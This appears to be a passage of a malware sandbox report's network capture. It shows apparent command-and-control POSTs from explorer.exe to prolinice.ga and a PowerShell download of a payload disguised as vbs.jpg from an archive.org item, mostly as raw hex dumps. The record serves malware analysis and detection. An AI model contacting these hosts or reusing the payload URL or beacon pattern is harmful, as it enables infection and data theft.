                                                    Data Ascii: uF3nbGfsU7a7BLyI816ZWJ4yfKpwU2CT4UJyhNXD24ULjQYT2PC+eubF9mABl0XSZt/tDHMB5FzaZHME4OQYzeX7mR7KE16MXoKPXPXCDcDyGOhEjnvo+P+VEGtZwd1soPW6bkW8SMGTFjDMfNFVCNYVWOw3Ge+bAQXeS7yD0Ar2GO+LC76jCfnM3xy7TMQwjezhF8++kOi1i2ulrsn7jN46zEuv2bzTGmatYxQa2E6cJCHsklf


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.2249166185.251.91.119801244C:\Windows\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 31, 2024 19:25:32.075747013 CEST277OUTPOST /index.php HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://cpbrvhywlnsy.com/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Length: 275
                                                    Host: prolinice.ga
                                                    Aug 31, 2024 19:25:32.075802088 CEST275OUTData Raw: 6e e2 e5 f9 b3 46 f7 64 1a 13 c4 15 49 51 f3 82 aa 21 91 26 42 fa cb e3 81 e0 7e 1b ad 3a 31 04 45 c7 9e b4 7b df 81 a5 60 b2 c4 f1 99 ac 30 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 fb bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 65 c2 e2 ce
                                                    Data Ascii: nFdIQ!&B~:1E{`0&7H8.6hEvRY;PLeRnOT6;9R*$kkK^5u#iLzy*zlqP}v|^+<;lM'})wTEm&qRZJ sT^ZVwQ#|
                                                    Aug 31, 2024 19:25:33.084430933 CEST1236INHTTP/1.1 404 Not Found
                                                    date: Sat, 31 Aug 2024 17:25:32 GMT
                                                    server: Apache/2.4.59 (Debian)
                                                    transfer-encoding: chunked
                                                    content-type: text/html; charset=utf-8
                                                    Data Raw: 33 37 44 33 0d 0a 18 00 00 00 a0 5f e8 0a 27 e8 c8 da 8d 2a 7f ba 53 e4 29 1d ec 5d a3 3f 18 cd 8f ba 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 [TRUNCATED]
                                                    Data Ascii: 37D3_'*S)]?,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R|~YrMM"jg/7L@+Y8#*P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z [TRUNCATED]
                                                    Aug 31, 2024 19:25:33.084510088 CEST1236INData Raw: f0 d3 5f c4 6b 30 c1 8f 61 0c bd 9f d9 57 2c d9 78 71 c3 ed 95 1c 57 62 73 a5 f6 ba 18 ea 07 01 95 65 ac 19 bf f4 04 76 fe 6d 42 8c 13 15 48 2c 63 3a fe 6c 25 54 4d 30 85 30 92 ad 37 23 ec 06 31 91 f0 16 ff a2 b3 e1 cd 3c d6 3f 9c 79 ef 0e 00 cb
                                                    Data Ascii: _k0aW,xqWbsevmBH,c:l%TM007#1<?ye-gtgcwmV`&$E^uAwI0q:<#yfHJy<4^/|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/
                                                    Aug 31, 2024 19:25:33.084522963 CEST1236INData Raw: 22 64 c2 b3 8e d1 96 69 6f da d8 11 e6 1b d4 e5 7a 74 48 ec 08 2a e9 cd 0c 7b b5 58 b4 8f 13 bb 67 d8 d1 b9 1a 51 6c 46 fe e3 7d e4 1d 37 e6 75 5c 03 96 01 ae 43 a2 02 37 3a 0c bb 2c 23 f6 16 c7 34 0b 51 a1 b0 42 47 f6 c4 67 8a ab d3 20 36 0f b2
                                                    Data Ascii: "dioztH*{XgQlF}7u\C7:,#4QBGg 6!D6w\)85/QN|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{
                                                    Aug 31, 2024 19:25:33.084636927 CEST1236INData Raw: 2c 06 25 d8 06 da cf 30 f2 f7 8c 37 90 3f e2 de 0d 62 d2 0f 0f f4 7b 4b 6b 0e 27 42 d6 53 86 5c e6 6b 56 9a 09 1a b2 a6 c7 d2 23 76 42 63 9d f6 9b 07 14 29 a7 e1 78 c2 42 36 6a 58 0a 60 23 51 bf 62 27 01 e7 c5 7d 19 05 9d be 9b b5 07 54 be 5e 5e
                                                    Data Ascii: ,%07?b{Kk'BS\kV#vBc)xB6jX`#Qb'}T^^bn}vfau)Nr)<h/Dgq`?|lD~c^%u=6N!\}K14KH;z<d#C^n+~UdH+J8SSo_g+>yS^5%#
                                                    Aug 31, 2024 19:25:33.084651947 CEST896INData Raw: 1b 78 58 7c 6e 7d 10 ca b5 cd d7 2c fd 6b 78 5c 75 ff dc 2a 31 1c 9e 90 dd ac 97 e6 a4 f6 22 18 13 70 9d 92 c8 89 04 06 7d 49 3e 2d 53 82 bd 66 00 6a 4f 59 66 f7 4f 3f 64 a0 0b 80 c4 24 55 57 f4 3d fb 23 d0 de c5 4b 19 0a 54 5a fe ff c3 bd 04 8f
                                                    Data Ascii: xX|n},kx\u*1"p}I>-SfjOYfO?d$UW=#KTZBhV1X)jGD_CfieRHncQl'$u;qdB4]*^%oAwKlos\if[y-ea(78i4v>ZGNj-L.EQO
                                                    Aug 31, 2024 19:25:33.084662914 CEST1236INData Raw: 37 88 29 8a 24 eb fb 84 da 2a cd f5 9d 59 71 50 56 70 81 45 b2 f6 0d 43 ef 48 f8 c3 24 06 48 8d 8e 94 3b 5c 6c 3d 16 67 4b 9e e1 a1 fc 33 1b 88 c3 ef 63 a2 c5 0a 7b 52 5c cd 51 14 a5 8d 92 6f b4 dd a6 82 43 f3 59 46 99 75 74 5c 58 84 7f fc d3 85
                                                    Data Ascii: 7)$*YqPVpECH$H;\l=gK3c{R\QoCYFut\XTaHNT.RE+S8x>\8UQ.'sDi2q85yjDgF*oaGu OvU'6(2N:BCdgIf/!Ih
                                                    Aug 31, 2024 19:25:33.084672928 CEST1236INData Raw: eb 04 bd f6 1b e3 e3 b3 ce 1e 73 cc 53 63 e9 91 64 95 8c 9a d1 b6 5a b2 de bf 6c 22 5b e0 b3 e0 66 fc 8f da 8f de 66 96 dc f2 c7 16 30 02 45 55 5a 28 71 df 03 a9 d5 a3 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3
                                                    Data Ascii: sScdZl"[ff0EUZ(qnmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71Sm
                                                    Aug 31, 2024 19:25:33.084683895 CEST448INData Raw: 5d 43 71 b7 72 68 e7 c3 5d 97 41 f7 8a 93 51 13 68 86 ef b2 b3 f4 3b 1d 8b 9a fa 6e 15 7d 51 ba 37 97 b6 0c 74 4a 03 25 aa 39 bc 3e d4 f9 b3 b7 95 fc d2 44 f5 2d db 0a e5 e9 86 70 da e1 4f 6b 80 17 d7 ab d4 a0 08 24 67 24 e3 fe c2 c7 f6 91 d7 cc
                                                    Data Ascii: ]Cqrh]AQh;n}Q7tJ%9>D-pOk$g$-~+G#v}b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n*_vUL*WvNzY
                                                    Aug 31, 2024 19:25:33.085165024 CEST1236INData Raw: f1 78 8e 29 7a 06 23 09 86 8f 6a c2 fa ab 2d 64 86 eb 24 dc 68 a0 b2 a8 55 d6 a7 65 ec e6 e3 ee 07 d2 07 10 34 55 34 aa 47 ab 58 e7 20 28 37 95 40 a5 b4 ba b4 1e fa 32 24 a6 1a fd e6 2e 44 02 5e a1 44 65 e0 f2 ab fe cd 8c e9 74 69 7b fc b8 ff 6a
                                                    Data Ascii: x)z#j-d$hUe4U4GX (7@2$.D^Deti{j\p%M;*^ kn?'CxKO@|7P@RS?JUet+XC?,c@<g7ks_'_bh.6^`u7x*H_Ul
                                                    Aug 31, 2024 19:25:33.085176945 CEST1236INData Raw: 09 e2 cb 0f 81 57 6d 67 5e d0 d4 95 49 5a 1c 02 ba 6c 4a ae c0 1a 7c c0 94 9b 9d 2e fe 17 02 29 28 46 57 39 ec 7b b9 da 55 2c f5 4f 31 88 a6 cc c5 4e e8 6d 4f 7e 19 c8 60 3f 6d 35 16 c6 f0 e2 e0 05 00 f0 f7 c9 5b f5 eb 55 64 58 ae df 99 6c e3 c5
                                                    Data Ascii: Wmg^IZlJ|.)(FW9{U,O1NmO~`?m5[UdXlc,7^UEr<l]_4-hP)"504o:`3X<`9xa-dW%hJm#{YSFf-b]Q?D\rMc\k&dbs7MLc>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.2249167185.251.91.119804056C:\Windows\SysWOW64\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 31, 2024 19:25:39.893795967 CEST274OUTPOST /index.php HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://prolinice.ga/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Length: 1395
                                                    Host: prolinice.ga
                                                    Aug 31, 2024 19:25:39.893848896 CEST1395OUTData Raw: 6e e2 e5 f9 b3 46 f7 64 1a 13 c4 15 49 51 f3 82 aa 21 91 26 42 fa cb e3 81 e0 7e 1b ad 3a 31 04 45 c7 9e b4 7b df 81 a5 60 b2 c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 5d 82 f8 a2
                                                    Data Ascii: nFdIQ!&B~:1E{`eug]H8.6hEvRY;PL]Oc~k_!z1rJC\S7Wx*>x :xGresn*q~TF%(v#RCIP6=I.:ua)i1b|Fz1~_"
                                                    Aug 31, 2024 19:25:40.927783012 CEST565INHTTP/1.1 404 Not Found
                                                    date: Sat, 31 Aug 2024 17:25:40 GMT
                                                    server: Apache/2.4.59 (Debian)
                                                    content-length: 409
                                                    content-type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.2249168185.251.91.119801244C:\Windows\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 31, 2024 19:26:52.623749971 CEST280OUTPOST /index.php HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://wehtwifahcxeheu.com/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Length: 109
                                                    Host: prolinice.ga
                                                    Aug 31, 2024 19:26:52.623781919 CEST109OUTData Raw: 6e e2 e5 f9 b3 46 f7 64 1a 13 c4 15 49 51 f3 82 aa 21 91 26 42 fa cb e3 81 e0 7e 1b ad 3a 31 04 45 c7 9e b4 7b df 81 a5 60 b2 c4 f1 99 ac 30 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 fb bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
                                                    Data Ascii: nFdIQ!&B~:1E{`0&7H8.6hEvRX;PLgjngaiF#Q 9
                                                    Aug 31, 2024 19:26:53.625802994 CEST161INHTTP/1.1 404 Not Found
                                                    date: Sat, 31 Aug 2024 17:26:53 GMT
                                                    server: Apache/2.4.59 (Debian)
                                                    content-length: 7
                                                    content-type: text/html; charset=utf-8
                                                    Data Raw: 03 00 00 00 a0 5f e8
                                                    Data Ascii: _
                                                    Aug 31, 2024 19:26:53.834259033 CEST161INHTTP/1.1 404 Not Found
                                                    date: Sat, 31 Aug 2024 17:26:53 GMT
                                                    server: Apache/2.4.59 (Debian)
                                                    content-length: 7
                                                    content-type: text/html; charset=utf-8
                                                    Data Raw: 03 00 00 00 a0 5f e8
                                                    Data Ascii: _


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.2249164207.241.232.1544433628C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-08-31 17:25:07 UTC111OUTGET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                    Host: ia803104.us.archive.org
                                                    Connection: Keep-Alive
                                                    2024-08-31 17:25:07 UTC591INHTTP/1.1 200 OK
                                                    Server: nginx/1.24.0 (Ubuntu)
                                                    Date: Sat, 31 Aug 2024 17:25:07 GMT
                                                    Content-Type: image/jpeg
                                                    Content-Length: 1931225
                                                    Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                    Connection: close
                                                    ETag: "66a41ab4-1d77d9"
                                                    Strict-Transport-Security: max-age=15724800
                                                    Expires: Sat, 31 Aug 2024 23:25:07 GMT
                                                    Cache-Control: max-age=21600
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                    Access-Control-Allow-Credentials: true
                                                    Accept-Ranges: bytes
                                                    2024-08-31 17:25:07 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                    2024-08-31 17:25:07 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                    Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                    2024-08-31 17:25:07 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                    Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                    2024-08-31 17:25:07 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                    Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                    2024-08-31 17:25:07 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                    Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                    2024-08-31 17:25:07 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                    Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                    2024-08-31 17:25:07 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                    Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                    2024-08-31 17:25:07 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                    Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
